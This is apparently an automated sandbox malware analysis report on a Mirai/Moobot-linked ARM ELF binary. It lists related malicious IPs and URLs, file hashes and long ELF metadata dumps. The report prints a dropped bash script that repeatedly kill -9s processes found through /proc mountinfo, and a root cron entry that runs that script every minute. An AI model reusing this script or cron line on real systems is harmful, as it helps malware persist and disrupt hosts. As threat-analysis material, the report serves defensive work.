                                                    154.216.17.9-skid.arm-2024-08-04T06_22_56.elfGet hashmaliciousMirai, MoobotBrowse
                                                    • 156.254.22.232
                                                    154.216.17.9-skid.mpsl-2024-08-04T06_22_50.elfGet hashmaliciousMirai, MoobotBrowse
                                                    • 156.238.223.101
                                                    https://www.pnxubwf.cn/Get hashmaliciousUnknownBrowse
                                                    • 156.231.11.124
                                                    205.185.120.123-skid.arm5-2024-07-27T10_33_41.elfGet hashmaliciousMirai, MoobotBrowse
                                                    • 156.238.223.161
                                                    205.185.120.123-skid.sh4-2024-07-27T10_33_38.elfGet hashmaliciousMirai, MoobotBrowse
                                                    • 156.238.223.130
                                                    https://obrsxbff.com/Get hashmaliciousUnknownBrowse
                                                    • 156.231.11.120

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    /dev/ocmountoc_i486.elfGet hashmaliciousMiraiBrowse
                                                      oc_x86_64.elfGet hashmaliciousMiraiBrowse
                                                        oc_aarch64.elfGet hashmaliciousUnknownBrowse
                                                          oc_mips.elfGet hashmaliciousUnknownBrowse
                                                            oc_i686.elfGet hashmaliciousMiraiBrowse
                                                              oc_arm7.elfGet hashmaliciousUnknownBrowse
                                                                oc_mipsel.elfGet hashmaliciousUnknownBrowse
                                                                  oc_arm.elfGet hashmaliciousUnknownBrowse

                                                                    Created / dropped Files

                                                                    /dev/ocmount

                                                                    Download File
                                                                    Process:/tmp/arm7.elf
                                                                    File Type:Bourne-Again shell script, ASCII text executable
                                                                    Category:dropped
                                                                    Size (bytes):479
                                                                    Entropy (8bit):4.026921351476117
                                                                    Encrypted:false
                                                                    SSDEEP:6:9rd/9GjuZZXegND07aW02vFgWccOHmAyCHOC1A9KiyhlrxleXUEMJJPJHeIHyHi5:rFGjuZog2+WvFgxq6DhllleXRW8ISCuU
                                                                    MD5:A3FC64B86B20A7B2EAA9330E1064D1F1
                                                                    SHA1:3A6F294C550A578D5E337F67FD4D9C1984EEA885
                                                                    SHA-256:6029DD069BC913653EEC32E54FB005A80FB71EBB5F0A584C71E06AC08FBBECE6
                                                                    SHA-512:CE26F2C6ECEC049B7053008E323018EC8A709942A456464A1D423F80B92BCA410D9B0F661093EB732254E6690900AC9A15B6F62450F72E6511195AEE403C50B6
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: oc_i486.elf, Detection: malicious, Browse
                                                                    • Filename: oc_x86_64.elf, Detection: malicious, Browse
                                                                    • Filename: oc_aarch64.elf, Detection: malicious, Browse
                                                                    • Filename: oc_mips.elf, Detection: malicious, Browse
                                                                    • Filename: oc_i686.elf, Detection: malicious, Browse
                                                                    • Filename: oc_arm7.elf, Detection: malicious, Browse
                                                                    • Filename: oc_mipsel.elf, Detection: malicious, Browse
                                                                    • Filename: oc_arm.elf, Detection: malicious, Browse
                                                                    Reputation:low
                                                                    Preview:#!/bin/bash..while true; do. cat /proc/$$/mountinfo | while read -r line; do. if [[ $line == *" /proc/"* ]]; then. if [[ $line != *"/boot"* ]]; then. PID=$(echo $line | grep -o "/proc/[0-9]*" | grep -o "[0-9]*"). PID=${PID#/proc/}. if [[ -n "$PID" ]]; then. echo "Found process the and kill pid: $PID". kill -9 $PID. fi. fi. fi. done. sleep 30.done.

                                                                    /etc/cron.d/mount.sh

                                                                    Download File
                                                                    Process:/bin/sh
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):38
                                                                    Entropy (8bit):3.8463189626846375
                                                                    Encrypted:false
                                                                    SSDEEP:3:3P11tKecVLE3Ov:ge7A
                                                                    MD5:67EC4A157E5B63970CFBB8CC55883AD7
                                                                    SHA1:5262B8C108DC3AEF69FCA6FFD959893DE852DC67
                                                                    SHA-256:0CB3CC915BB7492FF579F2B59237A5899088E5C5F238125AC9F0B5F73D2723E7
                                                                    SHA-512:EB6310992DC6E3AC1FCA2BCF26D82365494AA0ADBD80EE5EC6231B2418D1DAF6608F7820A560B4FBDA8C8885A59F8A82CA86AAA481F254D207926C1F6C5802B9
                                                                    Malicious:true
                                                                    Reputation:low
                                                                    Preview:* * * * * root /bin/bash /dev/ocmount.

                                                                    Static File Info

                                                                    General

                                                                    File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
                                                                    Entropy (8bit):6.049439988713495
                                                                    TrID:
                                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                    File name:arm7.elf
                                                                    File size:238'970 bytes
                                                                    MD5:c385a6903bce7de281b461464b9defa1
                                                                    SHA1:3a122e2033afa11b6ab684f3e66fe3ba49ae2cfa
                                                                    SHA256:85e15cc2fe331c89500ea2f7308b8006e5aa2745394ba915f1b369fbe5001d2a
                                                                    SHA512:dd2a90547461ab84111e3e520a8cf77a4318ecc1c068374542df45f056bc93df42f84dc0bdab81d0b5398d3c124f19dd3b6101d126d18a618a1bae1c9eb23f4f
                                                                    SSDEEP:6144:vXaUYrTJslBkasxHZVZDSkBepzuxOR/oHoM/R/GaRTxL:kJslBkaIZVZDSk09NKH9/FRTxL
                                                                    TLSH:09342B46AA408F13C4D727BAFA9F424533339B54D7E77306D528AFB03B8679A4F62601
                                                                    File Content Preview:.ELF..............(.........4...4.......4. ...(........p.S..........................................\U..\U..............\U..\U..\U.......U..............`U..`U..`U..................Q.td..................................-...L..................@-.,@...0....S

                                                                    Static ELF Info

                                                                    ELF header

                                                                    Class:ELF32
                                                                    Data:2's complement, little endian
                                                                    Version:1 (current)
                                                                    Machine:ARM
                                                                    Version Number:0x1
                                                                    Type:EXEC (Executable file)
                                                                    OS/ABI:UNIX - System V
                                                                    ABI Version:0
                                                                    Entry Point Address:0x8194
                                                                    Flags:0x4000002
                                                                    ELF Header Size:52
                                                                    Program Header Offset:52
                                                                    Program Header Size:32
                                                                    Number of Program Headers:5
                                                                    Section Header Offset:189492
                                                                    Section Header Size:40
                                                                    Number of Section Headers:30
                                                                    Header String Table Index:27

                                                                    Sections

                                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                    NULL0x00x00x00x00x0000
                                                                    .initPROGBITS0x80d40xd40x100x00x6AX004
                                                                    .textPROGBITS0x80f00xf00x222280x00x6AX0016
                                                                    .finiPROGBITS0x2a3180x223180x100x00x6AX004
                                                                    .rodataPROGBITS0x2a3280x223280x30840x00x2A008
                                                                    .ARM.extabPROGBITS0x2d3ac0x253ac0x180x00x2A004
                                                                    .ARM.exidxARM_EXIDX0x2d3c40x253c40x1980x00x82AL204
                                                                    .eh_framePROGBITS0x3555c0x2555c0x40x00x3WA004
                                                                    .tdataPROGBITS0x355600x255600x40x00x403WAT004
                                                                    .tbssNOBITS0x355640x255640x80x00x403WAT004
                                                                    .init_arrayINIT_ARRAY0x355640x255640x40x00x3WA004
                                                                    .fini_arrayFINI_ARRAY0x355680x255680x40x00x3WA004
                                                                    .jcrPROGBITS0x3556c0x2556c0x40x00x3WA004
                                                                    .gotPROGBITS0x355700x255700xc00x40x3WA004
                                                                    .dataPROGBITS0x356300x256300x2c80x00x3WA004
                                                                    .bssNOBITS0x358f80x258f80x52040x00x3WA004
                                                                    .commentPROGBITS0x00x258f80x13240x00x0001
                                                                    .debug_arangesPROGBITS0x00x26c200x1800x00x0008
                                                                    .debug_pubnamesPROGBITS0x00x26da00x23e0x00x0001
                                                                    .debug_infoPROGBITS0x00x26fde0x2aa70x00x0001
                                                                    .debug_abbrevPROGBITS0x00x29a850x99a0x00x0001
                                                                    .debug_linePROGBITS0x00x2a41f0x118c0x00x0001
                                                                    .debug_framePROGBITS0x00x2b5ac0x33c0x00x0004
                                                                    .debug_strPROGBITS0x00x2b8e80xabc0x10x30MS001
                                                                    .debug_locPROGBITS0x00x2c3a40x182a0x00x0001
                                                                    .debug_rangesPROGBITS0x00x2dbce0x7300x00x0001
                                                                    .ARM.attributesARM_ATTRIBUTES0x00x2e2fe0x160x00x0001
                                                                    .shstrtabSTRTAB0x00x2e3140x11e0x00x0001
                                                                    .symtabSYMTAB0x00x2e8e40x7a400x100x02911754
                                                                    .strtabSTRTAB0x00x363240x42560x00x0001

                                                                    Program Segments

                                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                    EXIDX0x253c40x2d3c40x2d3c40x1980x1984.76950x4R 0x4.ARM.exidx
                                                                    LOAD0x00x80000x80000x2555c0x2555c6.15950x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                                    LOAD0x2555c0x3555c0x3555c0x39c0x55a04.58710x6RW 0x8000.eh_frame .tdata .tbss .init_array .fini_array .jcr .got .data .bss
                                                                    TLS0x255600x355600x355600x40xc2.00000x4R 0x4.tdata .tbss
                                                                    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                                                                    Symbols

                                                                    NameVersion Info NameVersion Info File NameSection NameValueSizeSymbol TypeSymbol BindSymbol VisibilityNdx
                                                                    .symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                    .symtab0x80d40SECTION<unknown>DEFAULT1
                                                                    .symtab0x80f00SECTION<unknown>DEFAULT2
                                                                    .symtab0x2a3180SECTION<unknown>DEFAULT3
                                                                    .symtab0x2a3280SECTION<unknown>DEFAULT4
                                                                    .symtab0x2d3ac0SECTION<unknown>DEFAULT5
                                                                    .symtab0x2d3c40SECTION<unknown>DEFAULT6
                                                                    .symtab0x3555c0SECTION<unknown>DEFAULT7
                                                                    .symtab0x355600SECTION<unknown>DEFAULT8
                                                                    .symtab0x355640SECTION<unknown>DEFAULT9
                                                                    .symtab0x355640SECTION<unknown>DEFAULT10
                                                                    .symtab0x355680SECTION<unknown>DEFAULT11
                                                                    .symtab0x3556c0SECTION<unknown>DEFAULT12
                                                                    .symtab0x355700SECTION<unknown>DEFAULT13
                                                                    .symtab0x356300SECTION<unknown>DEFAULT14
                                                                    .symtab0x358f80SECTION<unknown>DEFAULT15
                                                                    .symtab0x00SECTION<unknown>DEFAULT16
                                                                    .symtab0x00SECTION<unknown>DEFAULT17
                                                                    .symtab0x00SECTION<unknown>DEFAULT18
                                                                    .symtab0x00SECTION<unknown>DEFAULT19
                                                                    .symtab0x00SECTION<unknown>DEFAULT20
                                                                    .symtab0x00SECTION<unknown>DEFAULT21
                                                                    .symtab0x00SECTION<unknown>DEFAULT22
                                                                    .symtab0x00SECTION<unknown>DEFAULT23
                                                                    .symtab0x00SECTION<unknown>DEFAULT24
                                                                    .symtab0x00SECTION<unknown>DEFAULT25
                                                                    .symtab0x00SECTION<unknown>DEFAULT26
                                                                    $a.symtab0x80d40NOTYPE<unknown>DEFAULT1
                                                                    $a.symtab0x2a3180NOTYPE<unknown>DEFAULT3
                                                                    $a.symtab0x80e00NOTYPE<unknown>DEFAULT1
                                                                    $a.symtab0x2a3240NOTYPE<unknown>DEFAULT3
                                                                    $a.symtab0x80f00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x81340NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x81940NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x81d00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x83140NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x83bc0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x90600NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x90a40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x94800NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x9c1c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x9c840NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x9dc40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x9e2c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x9e940NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xa4380NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xa9640NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xabfc0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xb11c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xb4ec0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xb5cc0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xbf940NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xc4940NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xcac80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xd0140NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xd4340NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xd5540NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xdbd80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xe1040NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xe6c00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xed940NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xf1b40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xf8500NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xfad80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xfdd00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0xffd00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x106700NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x10a8c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x10cec0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x110c40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1115c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x112d80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1135c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x11d680NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x11dbc0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x11e640NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x11f300NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x122580NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x127740NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x12c880NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x12cd80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x12d7c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x12dec0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x12e580NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x12ee80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1301c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x130440NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1354c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x13a5c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x13abc0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x13b100NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x13b380NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x13b800NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x13ba00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x13be00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x13c040NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x13c280NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x13c3c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x13cd00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x13d300NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x13dd00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x13e000NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x13e5c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x13e8c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x13f080NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x13ff00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x140800NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x141000NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x145200NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x145640NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x146600NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x146e40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1470c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x148000NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x148200NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x149240NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x152380NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x153240NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x153600NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x154980NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x154d00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x155500NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x155600NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1557c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x155d80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1566c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x156d80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1578c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x159ec0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x161c00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x161d80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x162f00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x163000NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x165000NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x166fc0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x168e80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x169340NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x169540NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x16aa80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x16ff40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x170780NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1707c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1709c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x170c40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x170d80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1712c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1718c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x174a00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x176a00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x179500NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x179980NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x17ad40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x17b780NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x17ca80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x181780NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x183680NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x18dec0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x18f880NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x191ac0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x191ec0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x193380NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x198ec0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x19b2c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1a1400NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1a1940NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1a1a40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1a2d00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1a4dc0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1a60c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1a7580NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1a8280NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1a8300NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1a9bc0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1aca80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1ad300NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1adf80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1ae580NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1afc40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1afcc0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1b12c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1b2180NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1b5080NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1b61c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1b7600NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1b7740NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1b7c00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1b80c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1b8140NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1b8180NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1b8440NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1b8500NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1b85c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1ba7c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1bbcc0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1bbe80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1bc480NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1bcb40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1bd6c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1bd8c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1bed00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1c4180NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1c4200NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1c4280NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1c4300NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1c4ec0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1c5300NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1cc440NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1cc8c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1ccc00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1cd3c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1cdc40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1cdcc0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1cdd80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1cde40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1ce7c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1cf700NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1cfb00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d0180NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d0500NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d0900NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d0bc0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d0e40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d0f80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d1300NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d1700NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d2500NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d2880NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d2c00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d3000NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d3440NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d3840NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d3c40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d4040NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d4640NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d4a40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d4e40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d5580NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d59c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d5dc0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d61c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d65c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d6940NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d6cc0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d7040NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d7480NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d7cc0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d80c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d8980NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d8d80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d9080NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1d9840NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1da940NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1db640NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1dc280NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1dcd80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1ddc00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1de680NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1de9c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1e1cc0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1e1ec0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1e2600NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1e2900NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1e2c00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1e2f40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1e3c40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1e8240NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1e8a40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1ea080NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1ea380NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1eb7c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1f3480NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1f3e80NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1f42c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1f5dc0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1f6300NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1fba00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1fbd00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1fc780NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1fd940NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x1feb00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x201600NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x2050c0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x205ac0NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x205e40NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x206a00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x206d00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x206e00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x206f00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x207900NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x207b00NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x208100NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x208340NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x208580NOTYPE<unknown>DEFAULT2
                                                                    $a.symtab0x209240NOTYPE<unknown>DEFAULT2
